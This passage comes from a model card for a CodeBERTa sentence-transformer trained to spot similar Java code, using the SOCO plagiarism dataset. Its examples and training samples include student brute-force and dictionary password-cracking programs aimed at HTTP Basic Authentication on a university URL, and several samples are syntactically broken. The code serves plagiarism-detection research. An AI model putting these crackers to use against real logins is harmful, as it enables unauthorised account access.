\n static String strOneLetterWords[];\n static String strTwoLetterWords[];\n\
\ static String strThreeLetterWords[];\n\n static String strExceptionPassword[];\n\
\n static String strLastPasswordTested;\n static String username = \"\";\n\
\n static int intNumberOfOneLetterWords = 0;\n static int intNumberOfTwoLetterWords\
\ = 0;\n static int intNumberOfThreeLetterWords = 0;\n\n static int intExceptionCount\
\ = -1;\n\n static int intNumberOfConnectionAttempts = 0;\n static int intTotalNumberOfWordsInFile\
\ = 0;\n\n\n\n\n public static void main (String args[])\n \n {\n\n\n \
\ \n \n Calendar calStart;\n Calendar calFinish; \n\
\ Date dateStart;\n Date dateFinish;\n lngStart;\n lngFinish;\n\
\n\n\n String strLine;\n String strTextFileName = \"/usr/share/lib/dict/words\"\
;\n\n boolean boolPasswordFound = false;\n boolean boolExceptionPasswordsTestedAgain\
\ = false;\n\n\n\n\n String urlString\n = \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
;\n\n int intCounter1;\n int intCounter2;\n int intCounter3;\n\n\
\ int intTotalNumberOfWordsChecked = 0;\n\n\n\n \n \n \
\ calStart = new GregorianCalendar();\n dateStart = calStart.getTime();\n\
\ lngStart = dateStart.getTime(); \n\n\n\n \n \n\
\ \n \n \n strExceptionPassword = new String[5000];\n\
\n\n \n \n getNumberOfVariousLengthsOfWords(strTextFileName);\n\
\n\n \n \n strOneLetterWords = new String[intNumberOfOneLetterWords];\n\
\ strTwoLetterWords = new String[intNumberOfTwoLetterWords];\n strThreeLetterWords\
\ = new String[intNumberOfThreeLetterWords];\n\n\n \n \n \
\ populateTheDifferentLengthArrays(strTextFileName);\n\n\n\n\n if (!boolPasswordFound)\
\ \n {\n\n\n \n \n\n intCounter1 = 0;\n\n \
\ while ( (!boolPasswordFound) && (intCounter1 < intNumberOfOneLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n boolPasswordFound\
\ = passwordWasFound(urlString,\n \
\ strOneLetterWords[intCounter1],\n \
\ boolPasswordFound);\n\n intCounter1++;\n\n intTotalNumberOfWordsChecked++;\n\
\n }\n\n\n\n \n \n\n intCounter1 = 0;\n\n\
\ while ( (!boolPasswordFound) && (intCounter1 < intNumberOfTwoLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n boolPasswordFound\
\ = passwordWasFound(urlString,\n \
\ strTwoLetterWords[intCounter1],\n \
\ boolPasswordFound);\n\n intCounter1++;\n\n intTotalNumberOfWordsChecked++;\n\
\n }\n\n\n\n \n \n\n intCounter1 = 0;\n\n\
\ while ( (!boolPasswordFound) && (intCounter1 < intNumberOfThreeLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n boolPasswordFound\
\ = passwordWasFound(urlString,\n \
\ strThreeLetterWords[intCounter1],\n \
\ boolPasswordFound);\n\n intCounter1++;\n\n \
\ intTotalNumberOfWordsChecked++;\n\n }\n\n\n\n \n \
\ \n \n\n intCounter1 = 0;\n\n while ( (!boolPasswordFound)\
\ && (intCounter1 < intNumberOfOneLetterWords) )\n {\n\n intCounter2\
\ = 0; \n\n while ( (!boolPasswordFound) && (intCounter2 < intNumberOfOneLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n \
\ boolPasswordFound \n = passwordWasFound(urlString,\n \
\ strOneLetterWords[intCounter1] + \n \
\ strOneLetterWords[intCounter2],\n \
\ boolPasswordFound); \n\n intCounter2++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n \n \n\n intCounter1 = 0;\n\n while\
\ ( (!boolPasswordFound) && (intCounter1 < intNumberOfOneLetterWords) )\n \
\ {\n\n intCounter2 = 0; \n\n while ( (!boolPasswordFound)\
\ && (intCounter2 < intNumberOfOneLetterWords) )\n {\n\n \
\ intCounter3 = 0; \n\n while ( (!boolPasswordFound) && (intCounter3\
\ < intNumberOfOneLetterWords) )\n {\n\n boolPasswordFound\
\ = true;\n\n boolPasswordFound \n = passwordWasFound(urlString,\n\
\ strOneLetterWords[intCounter1] \
\ + \n strOneLetterWords[intCounter2]\
\ +\n strOneLetterWords[intCounter3],\n\
\ boolPasswordFound); \n\n \
\ intCounter3++;\n\n intTotalNumberOfWordsChecked++;\n\
\n }\n\n\n intCounter2++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n\n intCounter1 = 0;\n\n while ( (!boolPasswordFound)\
\ && (intCounter1 < intNumberOfOneLetterWords) )\n {\n\n intCounter2\
\ = 0; \n\n while ( (!boolPasswordFound) && (intCounter2 < intNumberOfTwoLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n \
\ boolPasswordFound \n = passwordWasFound(urlString,\n \
\ strOneLetterWords[intCounter1] + \n \
\ strTwoLetterWords[intCounter2],\n \
\ boolPasswordFound); \n\n intCounter2++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n\n intCounter1 = 0;\n\n while ( (!boolPasswordFound)\
\ && (intCounter1 < intNumberOfTwoLetterWords) )\n {\n\n intCounter2\
\ = 0; \n\n while ( (!boolPasswordFound) && (intCounter2 < intNumberOfOneLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n \
\ boolPasswordFound \n = passwordWasFound(urlString,\n \
\ strTwoLetterWords[intCounter1] + \n \
\ strOneLetterWords[intCounter2],\n \
\ boolPasswordFound); \n\n intCounter2++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n \n \n\n intCounter1 = 0;\n\n while\
\ ( (!boolPasswordFound) && (intCounter1 <= intExceptionCount) )\n {\n\
\n boolExceptionPasswordsTestedAgain = true;\n boolPasswordFound\
\ = true;\n\n boolPasswordFound \n = passwordWasFound(urlString,\n\
\ strExceptionPassword[intCounter1],\n \
\ boolPasswordFound); \n\n intCounter1++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n } \n\n\n\
\n \n \n calFinish = new GregorianCalendar();\n dateFinish\
\ = calFinish.getTime();\n lngFinish = dateFinish.getTime(); \n\n\n\
\ \n \n System.out.println();\n System.out.println();\n\
\n\n System.out.println();\n System.out.println(\"Length of time for\
\ processing: \" + \n ((lngFinish - lngStart) / 1000)\
\ + \n \" seconds\");\n\n\n System.out.println();\n\
\ System.out.println(\"Total number of words in dictionary file = \" + intTotalNumberOfWordsInFile);\n\
\n\n System.out.println();\n System.out.println(\"Input file: number\
\ of words with one letter length = \" + intNumberOfOneLetterWords);\n \
\ System.out.println(\"Input file: number of words with two letter length =\
\ \" + intNumberOfTwoLetterWords);\n System.out.println(\"Input file: number\
\ of words with three letter length = \" + intNumberOfThreeLetterWords);\n\n\n\
\ System.out.println();\n System.out.println(\"Number of connection\
\ attempts = \" + intTotalNumberOfWordsChecked);\n\n\n System.out.println();\n\
\ System.out.println(\"Number of exceptions thrown = \" + (intExceptionCount\
\ + 1));\n System.out.println();\n\n\n if (intExceptionCount >= 0)\n\
\ {\n System.out.print(\"These passwords WERE \");\n\n if\
\ (boolExceptionPasswordsTestedAgain)\n System.out.print(\"tested again.\"\
);\n else\n System.out.print(\"NOT tested again.\");\n\n \
\ System.out.println();\n }\n\n\n if (boolPasswordFound) \n \
\ {\n System.out.println(\"The correct password WAS found - this password\
\ is '\" + \n strLastPasswordTested + \"'.\");\n \
\ } \n else\n {\n System.out.println(\"The correct password\
\ WAS NOT found.\");\n } \n \n System.out.println();\n\n\
\ }\n\n\n\n\n\n\n\n static void getNumberOfVariousLengthsOfWords(String TextFileName)\n\
\ \n {\n\n FileReader reader;\n BufferedReader inTextFile = null;\n\
\n String strLine;\n int intWordLength;\n\n\n\n try\n { \
\ \n \n \n \n \n \n reader\
\ = new FileReader(TextFileName);\n\n \n \n \n\
\ \n inTextFile = new BufferedReader(reader);\n\n\n \
\ strLine = inTextFile.readLine();\n\n\n while (strLine != null)\n \
\ {\n\n intTotalNumberOfWordsInFile++;\n\n strLine\
\ = strLine.trim();\n\n intWordLength = strLine.length();\n\n\n \
\ \n \n if (intWordLength == 1)\n \
\ intNumberOfOneLetterWords++;\n\n \n \n \
\ else if (intWordLength == 2) \n intNumberOfTwoLetterWords++;\n\
\n \n \n else if (intWordLength == 3)\n\
\ intNumberOfThreeLetterWords++;\n\n\n strLine = inTextFile.readLine();\n\
\n }\n\n }\n\n catch(FileNotFoundException e)\n {\n\n \
\ \n \n System.out.println();\n System.out.println(\"\
The file '\" + TextFileName + \"' cannot found.\");\n System.out.println();\n\
\n }\n\n catch(Exception e)\n {\n\n }\n\n finally\n \
\ {\n\n try\n {\n inTextFile.print();\n \
\ }\n catch(Exception e)\n {\n }\n\n inTextFile\
\ = null;\n reader = null;\n\n }\n\n } \n\n\n\n\n\n\n static\
\ void populateTheDifferentLengthArrays(String TextFileName)\n \n {\n\n \
\ FileReader reader;\n BufferedReader inTextFile = null;\n\n String\
\ strLine;\n int intWordLength;\n\n int intCountOfOneLetterWords =\
\ -1;\n int intCountOfTwoLetterWords = -1;\n int intCountOfThreeLetterWords\
\ = -1;\n\n\n\n try\n { \n \n \n \n \
\ \n \n reader = new FileReader(TextFileName);\n\n \
\ \n \n \n \n inTextFile = new\
\ BufferedReader(reader);\n\n\n strLine = inTextFile.readLine();\n\n\n\
\ while (strLine != null)\n {\n\n strLine = strLine.trim();\n\
\ intWordLength = strLine.length();\n\n\n \n \
\ \n if (intWordLength == 1)\n {\n intCountOfOneLetterWords++;\n\
\ strOneLetterWords[intCountOfOneLetterWords] = strLine;\n \
\ }\n\n \n \n else if (intWordLength\
\ == 2) \n {\n\n intCountOfTwoLetterWords++;\n \
\ strTwoLetterWords[intCountOfTwoLetterWords] = strLine;\n \
\ }\n\n \n \n else if (intWordLength ==\
\ 3)\n {\n intCountOfThreeLetterWords++;\n \
\ strThreeLetterWords[intCountOfThreeLetterWords] = strLine;\n \
\ }\n\n strLine = inTextFile.readLine();\n\n }\n\n }\n\
\n catch(FileNotFoundException e)\n {\n\n \n \n\
\ System.out.println();\n System.out.println(\"The file '\" +\
\ TextFileName + \"' cannot found.\");\n System.out.println();\n\n \
\ }\n\n catch(Exception e)\n {\n System.out.println(\"Exception\
\ thrown....\");\n System.err.println(e);\n }\n\n finally\n\
\ {\n\n try\n {\n inTextFile.print();\n \
\ }\n catch(Exception e)\n {\n }\n\n inTextFile\
\ = null;\n reader = null;\n\n }\n\n }\n\n\n\n\n\n\n\n static\
\ boolean passwordWasFound(String urlString,\n \
\ String password,\n boolean retVal)\n \
\ \n {\n\n String strEncodeInput = username + \":\" + password;\n \
\ boolean returnValue = retVal;\n boolean boolExceptionThrown = false;\n\n\
\n\n try\n {\n\n strLastPasswordTested = password;\n \n \
\ intNumberOfConnectionAttempts++;\n\n url = new URL(urlString);\n\
\n String encoding = new url.misc.BASE64Encoder().encode (strEncodeInput.getBytes());\n\
\n\n System.out.print(\"username = \" + \n username\
\ + \n \" \" +\n \
\ \"password = \" +\n password);\n\n\n\n HttpURLConnection\
\ urlConnection = (HttpURLConnection)url.openConnection();\n\n urlConnection.setRequestProperty(\"\
Authorization\", \n \" \" + encoding);\
\ \n\n System.out.println(\" response = \" + urlConnection.getResponseCode());\n\
\n if (urlConnection.getResponseCode() == 401)\n {\n \
\ returnValue = false; \n }\n\n }\n\n catch (MalformedURLException\
\ m)\n {\n boolExceptionThrown = true;\n returnValue = false;\n\
\n System.err.println(m);\n System.out.println(\"Malformed URL\
\ Exception error\");\n }\n\n catch (IOException io)\n {\n \
\ boolExceptionThrown = true;\n returnValue = false;\n\n System.out.println(\"\
IOException error\");\n System.err.println(io); \n }\n\n catch\
\ (Exception e)\n {\n boolExceptionThrown = true;\n returnValue\
\ = false;\n\n System.out.println(\"General exception.....\");\n \
\ System.err.println(e); \n }\n\n finally\n { \n urlConnection\
\ = null;\n url = null; \n }\n\n\n if (boolExceptionThrown)\n\
\ {\n intExceptionCount++;\n strExceptionPassword[intExceptionCount]\
\ = password;\n }\n\n\n return returnValue;\n\n }\n\n}"
- "import java.util.*;\nimport java.io.*;\nimport javax.swing.text.html.*;\n\n\n\
public class WatchDog {\n\n public WatchDog() {\n\n }\n public static void\
\ main (String args[]) {\n DataInputStream newin;\n\n try{\n System.out.println(\"\
ishti\");\n\n System.out.println(\"Downloading first copy\");\n Runtime.getRuntime().exec(\"\
wget http://www.cs.rmit.edu./students/ -O oldfile.html\");\n String[] cmdDiff\
\ = {\"//sh\", \"-c\", \"diff oldfile.html newfile.html > Diff.txt\"};\n \
\ String[] cmdMail = {\"//sh\", \"-c\", \"mailx -s \\\"Diffrence\\\" \\\"@cs.rmit.edu.\\\
\" < Diff.txt\"};\n while(true){\n Thread.sleep(24*60*60*1000);\n\
\ System.out.println(\"Downloading new copy\");\n Runtime.getRuntime().exec(\"\
wget http://www.cs.rmit.edu./students/ -O newfile.html\");\n Thread.sleep(2000);\n\
\ Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n\
\ newin = new DataInputStream( new FileInputStream( \"Diff.txt\"));\n\
\ if (newin.readLine() != null){\n System.out.println(\"\
Sending Mail\");\n Runtime.getRuntime().exec(cmdMail);\n \
\ Runtime.getRuntime().exec(\"cp newfile.html oldfile.html\");\n\n \
\ }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n\
\ }\n\n }\n\n}"
datasets:
- buelfhood/SOCO_TRAIN_java
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) on the [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) dataset. It maps sentences and paragraphs (here, Java source files) to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java)
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
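As the configuration above shows, the `Pooling` module averages all token embeddings (mean pooling, `pooling_mode_mean_tokens=True`) into a single 768-dimensional vector per input; CLS, max, and the other listed pooling modes are disabled.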
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CODEBERTA-MNRL-TRIPLETS-E1-B16")
# Run inference
sentences = [
'import java.net.*;\nimport java.io.*;\n\npublic class BruteForce {\n private String strUserName;\n private String strURL;\n private int iAttempts;\n \n public BruteForce(String strURL,String strUserName) {\n this.strURL = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n\n }\n \n public String getPassword(){\n URL u;\n String result ="";\n PassGenBrute PG = new PassGenBrute(3);\n URLConnection uc;\n String strPassword = new String();\n String strEncode;\n try{\n while (result.compareTo("HTTP/1.1 200 OK")!=0){\n \n strEncode = PG.getNewPassword();\n u = new URL(strURL);\n uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode = strUserName + ":" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n uc.setRequestProperty("Authorization"," " + strEncode);\n \n result = uc.getHeaderField(0);\n uc = null;\n u = null;\n iAttempts++;\n }\n\n }\n catch (Exception me) {\n System.out.println("MalformedURLException: "+me);\n }\n return(strPassword);\n }\n \n public int getAttempts(){\n return (iAttempts);\n };\n \n public static void main (String arg[]){\n timeStart = 0;\n timeEnd = 0;\n \n if (arg.length == 2) {\n BruteForce BF = new BruteForce(arg[0],arg[1]);\n System.out.println("Processing ... ");\n timeStart = System.currentTimeMillis();\n \n System.out.println("Password = " + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n System.out.println("Total Time Taken = " + (timeEnd - timeStart) + " (msec)");\n System.out.println("Total Attempts = " + BF.getAttempts());\n }\n else {\n System.out.println("[Usage] java BruteForce <URL> <USERNAME>");\n\n }\n\n }\n}\n\nclass PassGenBrute {\n private char[] password;\n public PassGenBrute(int lenght) {\n password = new char[lenght];\n for (int i = 0; i < lenght; i++){\n password[i] = 65;\n }\n password[0]--;\n }\n \n public String getNewPassword()\n throws PasswordFailureException{\n password[0]++;\n\n try {\n for (int i=0; i<password.length ; i++){\n if (password[i] == 90) {\n password[i] = 97;\n }\n if (password[i] > 122) {\n password[i] = 65;\n password[i+1]++;\n }\n }\n }\n catch (RuntimeException re){\n throw new PasswordFailureException ();\n }\n return new String(password);\n }\n}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException() {\n }\n}',
'import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private String strUserName;\n private String strURL;\n private String strDictPath;\n private int iAttempts;\n\n \n public Dictionary(String strURL,String strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n }\n \n\n public String getPassword(){\n URL u;\n String result ="";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection uc;\n String strPassword = new String();\n String strEncode;\n try{\n while (result.compareTo("HTTP/1.1 200 OK")!=0){\n \n strEncode = PG.getNewPassword();\n u = new URL(strURL);\n uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode = strUserName + ":" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n uc.setRequestProperty("Authorization"," " + strEncode);\n \n result = uc.getHeaderField(0);\n uc = null;\n u = null;\n iAttempts++;\n }\n\n }\n catch (Exception me) {\n System.out.println("MalformedURLException: "+me);\n }\n return(strPassword);\n }\n \n public int getAttempts(){\n return (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println("Processing ... ");\n timeStart = System.currentTimeMillis();\n System.out.println("Password = " + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n System.out.println("Total Time Taken = " + (timeEnd - timeStart) + " (msec)");\n System.out.println("Total Attempts = " + BF.getAttempts());\n }\n else {\n System.out.println("[Usage] java BruteForce <URL> <USERNAME> <Dictionary path>");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public String getNewPassword()\n throws PasswordFailureException{\n try {\n {\n line = inputFile.readLine();\n }while (line.length() != iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException() {\n }\n}',
'import java.util.*;\nimport java.io.*;\nimport javax.swing.text.html.*;\n\n\npublic class WatchDog {\n\n public WatchDog() {\n\n }\n public static void main (String args[]) {\n DataInputStream newin;\n\n try{\n System.out.println("ishti");\n\n System.out.println("Downloading first copy");\n Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O oldfile.html");\n String[] cmdDiff = {"//sh", "-c", "diff oldfile.html newfile.html > Diff.txt"};\n String[] cmdMail = {"//sh", "-c", "mailx -s \\"Diffrence\\" \\"@cs.rmit.edu.\\" < Diff.txt"};\n while(true){\n Thread.sleep(24*60*60*1000);\n System.out.println("Downloading new copy");\n Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O newfile.html");\n Thread.sleep(2000);\n Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n newin = new DataInputStream( new FileInputStream( "Diff.txt"));\n if (newin.readLine() != null){\n System.out.println("Sending Mail");\n Runtime.getRuntime().exec(cmdMail);\n Runtime.getRuntime().exec("cp newfile.html oldfile.html");\n\n }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n }\n\n }\n\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[ 1.0000, 0.9429, -0.0889],
# [ 0.9429, 1.0000, -0.0690],
# [-0.0889, -0.0690, 1.0000]])
```
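In the example output above, the two password-cracking programs (near-duplicate submissions from the source-code plagiarism dataset) score about 0.94, while the unrelated `WatchDog` page monitor scores close to zero, which is exactly the separation this model is trained to produce.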
### Direct Usage (Transformers)
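If you prefer the plain 🤗 Transformers API, you can reproduce the embeddings by running the underlying RoBERTa encoder and applying the same masked mean pooling as the `Pooling` module above. This is a minimal sketch, assuming the repository exposes the standard Transformers weights and tokenizer (as Sentence Transformers repositories normally do):
```python
import torch
import torch.nn.functional as F
from transformers import AutoModel, AutoTokenizer

repo = "buelfhood/SOCO-Java-CODEBERTA-MNRL-TRIPLETS-E1-B16"
tokenizer = AutoTokenizer.from_pretrained(repo)
model = AutoModel.from_pretrained(repo)

sentences = [
    "public int add(int a, int b) { return a + b; }",
    "public int sum(int x, int y) { return x + y; }",
]

# Tokenize with the same limit as the Transformer module above (max_seq_length=512).
encoded = tokenizer(sentences, padding=True, truncation=True, max_length=512, return_tensors="pt")

with torch.no_grad():
    token_embeddings = model(**encoded).last_hidden_state  # [batch, seq_len, 768]

# Masked mean pooling, mirroring pooling_mode_mean_tokens=True.
mask = encoded["attention_mask"].unsqueeze(-1).float()
embeddings = (token_embeddings * mask).sum(dim=1) / mask.sum(dim=1).clamp(min=1e-9)

# Cosine similarity, the model's configured similarity function.
print(F.cosine_similarity(embeddings[0], embeddings[1], dim=0))
```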
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
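For example, continued finetuning on the same triplet dataset could look like the sketch below. The loss and hyperparameters here are inferred from the model name (MNRL triplets, 1 epoch, batch size 16) and are assumptions, not a statement of the exact recipe used for this checkpoint:
```python
from datasets import load_dataset
from sentence_transformers import (
    SentenceTransformer,
    SentenceTransformerTrainer,
    SentenceTransformerTrainingArguments,
)
from sentence_transformers.losses import MultipleNegativesRankingLoss

# Triplets with columns: anchor_code, positive_code, negative_code.
train_dataset = load_dataset("buelfhood/SOCO_TRAIN_java", split="train")

model = SentenceTransformer("buelfhood/SOCO-Java-CODEBERTA-MNRL-TRIPLETS-E1-B16")

# MultipleNegativesRankingLoss ranks each anchor's positive above its
# explicit negative and all other in-batch candidates.
loss = MultipleNegativesRankingLoss(model)

args = SentenceTransformerTrainingArguments(
    output_dir="soco-java-codeberta-finetuned",  # hypothetical output path
    num_train_epochs=1,               # assumption, mirroring the "E1" suffix
    per_device_train_batch_size=16,   # assumption, mirroring the "B16" suffix
)

trainer = SentenceTransformerTrainer(
    model=model,
    args=args,
    train_dataset=train_dataset,
    loss=loss,
)
trainer.train()
```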
## Training Details
### Training Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 38,664 training samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 466.15 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 467.06 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 454.38 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class Dictionary<br>{<br> public Dictionary()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter sw= new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in =<br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine())...</code> | <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class BruteForce<br>{<br> public BruteForce()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter = new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in = <br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine()) ...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class Dictionary{<br><br> private static URL location;<br> private static String user;<br> private BufferedReader input;<br> private static BufferedReader dictionary;<br> private int maxLetters = 3;<br><br> <br><br> public Dictionary() {<br> <br> Authenticator.setDefault(new MyAuthenticator ());<br><br> startTime = System.currentTimeMillis();<br> boolean passwordMatched = false;<br> while (!passwordMatched) {<br> try {<br> input = new BufferedReader(new InputStreamReader(location.openStream()));<br> String line = input.readLine();<br> while (line != null) {<br> System.out.println(line);<br> line = input.readLine();<br> }<br> input.close();<br> passwordMatched = true;<br> }<br> catch (ProtocolException e)<br> {<br> <br> <br> }<br> catch (ConnectException e) {<br> System.out.println("Failed connect");<br> }<br> catch (IOException e) ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br>public class WatchdogPropertyHelper {<br><br> private static Properties testProps;<br><br><br><br> public WatchdogPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> WatchdogPropertyHelper.class.getResourceAsStream("/watchdog.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String 